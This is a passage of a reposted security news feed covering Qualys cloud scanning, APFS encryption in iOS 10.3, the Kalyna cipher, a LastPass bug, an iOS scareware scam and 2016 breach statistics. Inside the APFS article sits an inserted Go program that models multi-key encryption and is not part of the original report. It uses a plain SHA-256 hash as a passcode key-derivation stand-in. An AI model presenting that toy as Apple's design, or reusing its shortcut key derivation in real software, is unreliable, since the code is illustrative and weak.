  • Internal asset scanning and app protection, which provides vulnerability analysis and compliance checks across operating systems, databases and servers, as well as identification of application and REST API vulnerabilities, combined with firewall rules and one-click virtual patching.
  • Perimeter scanning, which gives you a continuous hacker’s-eye view into all your public IPs.

For security and compliance data collection, we offer options including virtual scanner appliances, lightweight and configurable cloud agents and Internet scanners.

Cloud coverage: AWS, Azure and Google Cloud, with more to come

Qualys has agreements and integrations with the three main public cloud platform providers: Amazon, Microsoft and Google.

For AWS, our Qualys Virtual Scanner Appliance (QVSA) is pre-authorized by Amazon, and we support both EC2-Classic and EC2-VPC (Virtual Private Cloud). In addition, our groundbreaking Cloud Agents are also certified to work in EC2, giving you the option of using them for security and compliance monitoring as well.

Meanwhile, the QVSA is available in the Azure marketplace, where we support both the Classic and ARM modes. The Qualys Cloud Agents are integrated within the Azure Security Center.

In Google Cloud, you’ll find the QVSA in the Launcher, and the Cloud Agents are certified to work with this platform.

In all cases — AWS, GCP and Azure — you license the Qualys tools from us and use them on your cloud instances, the BYOL (bring your own licensing) model.

Qualys is working to add support for a few more cloud platforms.

Proven success

Qualys is already being used to protect critical cloud workloads in the real world. For example, a large global bank replicated the success of its mature vulnerability management program for on-premises data centers on AWS instances, which it is aggressively adopting.

With more than 20,000 AWS instances getting frequently refreshed, the bank needed visibility across its rapidly-growing cloud deployments. The CISO was also looking to consolidate tools and processes.

The bank utilized AssetView, Qualys’ automated IT asset inventory service, to obtain visibility and detailed asset information from its EC2 instances using Qualys scanners and agents. To monitor edge servers, it is using Qualys perimeter Internet scanners.

In addition, an online video streaming company with a global presence is using Qualys to automate security and compliance within a DevOps process in AWS.

With frequent load bursts and a high churn of elastic cloud instances, the company realized it needed agile security practices and quick and clear visibility into its cloud environment, as well as automated and API centric build processes.

The company incorporated Qualys scanning into the build process to check for vulnerabilities and compliance violations early and often, and implemented end-to-end automation using REST APIs.

With our existing security and compliance capabilities for cloud instances, we are supporting and securing your infrastructure in the cloud, so you’ll have a single pane of glass view of your hybrid on-premises and cloud IT environment.


from Help Net Security http://ift.tt/2owsMsX

With iOS 10.3, iDevices get new Apple File System with native encryption support

On Monday, Apple released updates for its various products. As usual, they fix flaws and add capabilities, but the iOS update (v10.3) is more noteworthy than usual, as it will make all updated iDevices switch to a new file system.

It’s called Apple File System (APFS).

APFS is engineered with encryption as a primary feature (it has native encryption support), and is optimized for Flash/SSD storage (the HFS+ file system these devices used until now was developed when file sizes were calculated in kilobytes or megabytes).

Add to this copy-on-write metadata, space sharing, cloning for files and directories, snapshots, fast directory sizing, atomic safe-save primitives, and improved file system fundamentals, and you have a file system that should meet the challenges of this era.

APFS and encryption

APFS supports multiple levels of file system encryption – no encryption, one key per volume (metadata and data are encrypted with the same key), and multi-key encryption.

As Apple developers explained at last year’s Worldwide Developers Conference, in the latter option, sensitive metadata is encrypted with a single key that’s distinct from the per file keys that are used in encrypting individual files. APFS also supports per extent encryption, so each region of a file can be encrypted with its own key.

“Apple File System uses AES-XTS or AES-CBC encryption modes, depending on hardware,” the company shared in this guide to the new file system.

“Multi-key encryption ensures the integrity of user data. Even if someone were to compromise the physical security of the device and gain access to the device key, they still couldn’t decrypt the user’s files.”
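To make the key separation described above concrete, here is an added Go model of a three-level hierarchy. It is not Apple's code and not how APFS is implemented; it only reproduces the property the quote claims. A class key derived from the device key plus the user's passcode wraps each per-file key, and each extent of a file is sealed under its own key, so an attacker holding only the device key cannot unwrap anything. Assumptions made for this example: AES-GCM stands in for AES-XTS/AES-CBC, SHA-256 over device key and passcode stands in for a hardware-entangled passcode KDF, extent keys are derived from the file key and extent index, and the names classKey, WriteFile and ReadFile are this example's own.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
	"io"
)

func randomBytes(n int) []byte {
	b := make([]byte, n)
	if _, err := io.ReadFull(rand.Reader, b); err != nil {
		panic(err)
	}
	return b
}

// gcm: AES-256-GCM over a 32-byte key; a stand-in for the AES-XTS/CBC modes the article names.
func gcm(key []byte) cipher.AEAD {
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	g, _ := cipher.NewGCM(block)
	return g
}

// seal encrypts under key with a fresh random nonce prepended to the output.
func seal(key, plaintext []byte) []byte {
	g := gcm(key)
	nonce := randomBytes(g.NonceSize())
	return g.Seal(nonce, nonce, plaintext, nil)
}

// open reverses seal; it fails on a wrong key or tampered data.
func open(key, sealed []byte) ([]byte, error) {
	g := gcm(key)
	return g.Open(nil, sealed[:g.NonceSize()], sealed[g.NonceSize():], nil)
}

// classKey wraps per-file keys and depends on BOTH the device key and the passcode, so neither
// alone unwraps a file key. SHA-256 over the concatenation is a toy stand-in for a real passcode KDF.
func classKey(deviceKey []byte, passcode string) []byte {
	h := sha256.Sum256(append(append([]byte{}, deviceKey...), passcode...))
	return h[:]
}

// extentKey gives each region of a file its own key (derived from file key and index; a modelling choice).
func extentKey(fileKey []byte, index int) []byte {
	h := sha256.Sum256(append(append([]byte{}, fileKey...), byte(index>>8), byte(index)))
	return h[:]
}

// File stores its key wrapped under the class key (never raw) and its extents, each sealed separately.
type File struct{ WrappedFileKey []byte; Extents [][]byte }

// WriteFile splits content into extents of extentSize bytes and wraps the fresh per-file key under ck.
func WriteFile(content []byte, extentSize int, ck []byte) *File {
	fileKey := randomBytes(32)
	f := &File{WrappedFileKey: seal(ck, fileKey)}
	for off := 0; off < len(content); off += extentSize {
		end := off + extentSize
		if end > len(content) {
			end = len(content)
		}
		f.Extents = append(f.Extents, seal(extentKey(fileKey, len(f.Extents)), content[off:end]))
	}
	return f
}

// ReadFile unwraps class key -> file key -> extent keys; with only the device key it fails at step one.
func ReadFile(f *File, ck []byte) ([]byte, error) {
	fileKey, err := open(ck, f.WrappedFileKey)
	if err != nil {
		return nil, fmt.Errorf("cannot unwrap file key: %w", err)
	}
	var out []byte
	for i, e := range f.Extents {
		pt, err := open(extentKey(fileKey, i), e)
		if err != nil {
			return nil, err
		}
		out = append(out, pt...)
	}
	return out, nil
}

func main() {
	deviceKey := randomBytes(32) // stands in for the per-device hardware key
	f := WriteFile([]byte("hello multi-key world"), 8, classKey(deviceKey, "1234"))
	pt, err := ReadFile(f, classKey(deviceKey, "1234"))
	fmt.Printf("with passcode: %q err=%v\n", pt, err)
	_, err = ReadFile(f, deviceKey) // device key alone, the article's scenario
	fmt.Println("device key alone:", err)
}
```

The design choice worth noting is that no key is ever stored in the clear: the file key exists on "disk" only wrapped under the class key, and the class key itself is never stored but recomputed from device key and passcode. That is what turns a stolen device key into a dead end rather than a master key, and it is also why per-file keys can be discarded individually to make a single file unrecoverable.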

The company aims to implement APFS eventually in all of its products, but has started with iOS-running devices. It is scheduled to be shipped to macOS consumers later this year.

A list of other improvements and new features included in the newest iOS version can be found here, and a list of security fixes here. iOS 10.3 also fixes a bug in the way that Mobile Safari handles pop-up dialogs, recently exploited by scammers.


from Help Net Security http://ift.tt/2oulCFt

Website Performance Bootcamp: Quiz-based training course

The Website Performance Bootcamp is an online portal that provides quiz-based technical training in the field of website acceleration and content optimization.

Whether you’re running an e-commerce site, online gaming platform or enterprise website, your users expect a great experience every time they visit your site. Content Delivery Networks (CDNs) are an effective way to achieve this goal, minimizing site load times and reducing operational costs.

What’s inside?

This comprehensive quiz-based training course is comprised of 16 sections, divided into Basic and Advanced levels, on topics ranging from content caching to HTTP protocol and file compression techniques.

These challenging quizzes are designed to do much more than just test your knowledge and give you a score. Each question comes with a complete explanation of the right answer so you can learn from your mistakes.


from Help Net Security http://ift.tt/2nw9sxZ

Kalyna Block Cipher

Kalyna is a block cipher that became a Ukrainian national standard in 2015. It supports block and key sizes of 128, 256, and 512 bits. Its structure resembles AES but is optimized for 64-bit CPUs, and it has a complicated key schedule. The number of rounds ranges from 10 to 18, depending on block and key sizes.

There is some mention of cryptanalysis on reduced-round versions in the Wikipedia entry. And here are the other submissions to the standard.


from Schneier on Security http://ift.tt/2ncEfNf

LastPass is working on fixing latest code execution bug

It’s been an eventful couple of weeks for LastPass developers, as they’ve scrambled to fix a couple of serious flaws in the popular password manager’s extensions, which would allow attackers to get at users’ passwords and even execute code on the users’ machines.

The flaws were flagged by Google Project Zero researcher Tavis Ormandy, and responsibly disclosed to the company. To their credit, LastPass has been doing a great job at responding to the vulnerability reports – even Ormandy says so.

But some fixed versions of the extensions were not immediately published, because the company waited for Microsoft and Opera to approve them beforehand.

Then, on Saturday, Ormandy came up with a new way to perform code execution in LastPass for Chrome 4.1.43 (the current latest version of the extension). He sent the working exploit and bug report immediately to LastPass, and the company acknowledged it.

“Over the weekend, Google security researcher Tavis Ormandy reported a new client-side vulnerability in the LastPass browser extension. We are now actively addressing the vulnerability,” they noted.

“This attack is unique and highly sophisticated. We don’t want to disclose anything specific about the vulnerability or our fix that could reveal anything to less sophisticated but nefarious parties. So you can expect a more detailed post mortem once this work is complete.”

The company has 90 days to fix the flaw before Google goes public with information about it, as per their vulnerability disclosure policy.

Ormandy’s tweet about the new exploit has fuelled a discussion on Twitter about responsible vulnerability disclosure, with some taking umbrage at the fact that he revealed the bug’s existence, while many others took the security researcher’s side, noting that he didn’t reveal details that would help attackers exploit the vulnerability.

Ormandy just confirmed that the exploit works on all browser extensions and platforms, even if users temporarily log out of the extension, and pointed out that “it will take a long time to fix this properly, it’s a major architectural problem.”

LastPass has noted that they greatly value the work that Tavis, Project Zero, and other white-hat researchers provide.

“We all benefit when this security model works for responsibly disclosing bugs, and are confident LastPass is stronger for the attention,” they commented, and invited contributions from all researchers via their bug bounty program.


from Help Net Security http://ift.tt/2otK1Lo

Scareware scammers target iOS users

A bug in the way that Mobile Safari handles pop-up dialogs has been abused to scare iOS users into paying a “fine” in the form of an iTunes pre-paid card.

The iOS scareware scam

“This attack was initially reported to Lookout’s Support desk by one of our users running iOS 10.2. The user reported that he had lost control of Safari after visiting a website and was no longer able to use the browser,” Lookout researchers explained.

“The user provided a screenshot showing a ransomware message from pay-police[.]com, with an overlaid ‘Cannot Open Page’ dialog from Safari. Each time he tapped ‘OK’ he would be prompted to tap ‘OK’ again, effectively putting the browser into an infinite loop of dialog prompts that prevented him from using the browser.”

The scammers have purchased a large number of different domains, and equipped them with obfuscated JavaScript code that would trigger the bug in Mobile Safari.

The website was also capable of “recognizing” the users’ country code identifier, and serve different messages based on it. The intended targets were mostly from English-speaking countries: the US, the UK, Ireland, Australia and New Zealand.

But what some of the victims probably didn’t know is that they could have easily restored the browser’s functionality by simply emptying its cache (Settings > Safari > Clear History and Website Data).

The attack was contained within Safari’s sandbox, so the victims’ devices were not actually compromised. The attackers banked on users’ fear and shame to pull the scam off.

Upgrade to iOS 10.3

Lookout notified Apple of the attack, and the iThings manufacturer fixed the abused flaw in iOS 10.3, which was released on Monday.

“The pop-up window error dialog on newer versions of iOS is actually the result of Mobile Safari not being able to find a local URL lookup, so it fails, but keeps presenting the dialog message due to the infinite loop in the code,” the researchers explained.

“The attack, based on its code, seems to have been developed for older versions of iOS, such as iOS 8. However, the abuse of pop-ups in Mobile Safari was still possible until iOS 10.3.”

With the new iOS version, these pop-ups won’t be locking the entire browser, but just that one tab, which can be simply closed and the user can continue using the browser like nothing happened.

Users are advised to update their iOS-running iThings to version 10.3 to close up this particular attack vector.


from Help Net Security http://ift.tt/2nq581A

1.37 billion data records compromised globally in 2016

Gemalto’s Breach Level Index revealed that 1,792 data breaches led to 1.37 billion data records being compromised worldwide during 2016, an increase of 86% compared to 2015. Identity theft was the leading type of data breach in 2016, accounting for 59% of all data breaches. In addition, 52% of the data breaches in 2016 did not disclose the number of compromised records at the time they were reported.

The Breach Level Index (BLI) is a global database that tracks data breaches and measures their severity based on multiple dimensions, including the number of records compromised, the type of data, the source of the breach, how the data was used, and whether or not the data was encrypted. By assigning a severity score to each breach, the Breach Level Index provides a comparative list of breaches, distinguishing data breaches that are not serious from those that are truly impactful (scores run from 1 to 10).

According to the BLI, more than 7 billion data records have been exposed since 2013, when the index began benchmarking publicly disclosed data breaches. Broken down, that is over 3 million records compromised every day, or roughly 44 records every second.

Last year, the account access based attack on AdultFriend Finder exposing 400 million records scored a 10 in terms of severity on the BLI. Other notable breaches in 2016 included Fling (BLI: 9.8), Philippines’ Commission on Elections (COMELEC) (BLI: 9.8), 17 Media (BLI: 9.7) and Dailymotion (BLI: 9.6). In fact, the top 10 breaches in terms of severity accounted for over half of all compromised records. In 2016, Yahoo! reported two major data breaches involving 1.5 billion user accounts, but they are not accounted for in the BLI’s 2016 numbers since they occurred in 2013 and 2014.

“The BLI highlights four major cybercriminal trends over the past year. Hackers are casting a wider net and are using easily-attainable account and identity information as a starting point for high value targets. Clearly, fraudsters are also shifting from attacks targeted at financial organisations to infiltrating large data bases such as entertainment and social media sites. Lastly, fraudsters have been using encryption to make breached data unreadable, then holding it for ransom and decrypting it once they are paid,” said Jason Hart, VP and CTO for Data Protection at Gemalto.

Data breaches by type

In 2016, identity theft was the leading type of data breach, accounting for 59% of all data breaches, up by 5% from 2015. The second most prevalent type of breach in 2016 is account access based breaches. While the incidence of this type of data breach decreased by 3%, it made up 54% of all breached records, which is an increase of 336% from the previous year. This highlights the cybercriminal trend from financial information attacks to bigger databases with large volumes of personally identifiable information. Another notable data point is the nuisance category with an increase of 102% accounting for 18% of all breached records up 1474% since 2015.

Data breaches by source

Malicious outsiders were the leading source of data breaches, accounting for 68% of breaches, up from 13% in 2015. The number of records breached in malicious outsider attacks increased by 286% from 2015. Hacktivist data breaches also increased in 2016 by 31%, but only account for 3% of all breaches that occurred last year.

Data breaches by industry

Across industries, the technology sector had the largest increase in data breaches in 2016. Breaches rose 55%, but only accounted for 11% of all breaches last year. Almost 80% of the breaches in this sector were account access and identity theft related. They also represented 28% of compromised records in 2016, an increase of 278% from 2015.

The healthcare industry accounted for 28% of data breaches, rising 11% compared to 2015. However, the number of compromised data records in healthcare decreased by 75% since 2015. Education saw a 5% decrease in data breaches between 2015 and 2016 and a drop of 78% in compromised data records. Government accounted for 15% of all data breaches in 2016. However the number of compromised data records increased 27% from 2015. Financial services companies accounted for 12% of all data breaches, a 23% decline compared to the previous year.

All industries listed in the ‘Other’ category represented 13% of data breaches and 36% of compromised data records. In this category, the overall number of data breaches decreased by 29%, while the number of compromised records jumped by 300% since 2015. Social media and entertainment industry related data breaches made up the majority.

Last year 4.2% of the total number of breach incidents involved data that had been encrypted in part or in full, compared to 4% in 2015. In some of these instances, the password was encrypted, but other information was left unencrypted. However of the almost 1.4 billion records compromised, lost or stolen in 2016, only 6% were encrypted partially or in full (compared to 2% in 2015).

“Knowing exactly where their data resides and who has access to it will help enterprises outline security strategies based on data categories that make the most sense for their organisations. Encryption and authentication are no longer ‘best practices’ but necessities. This is especially true with new and updated government mandates like the upcoming General Data Protection Regulation (GDPR) in Europe, U.S state-based and APAC country-based breach disclosure laws. But it’s also about protecting your business’ data integrity, so the right decisions can be made based on accurate information, therefore protecting your reputation and your profits.”


from Help Net Security http://ift.tt/2nbO3qA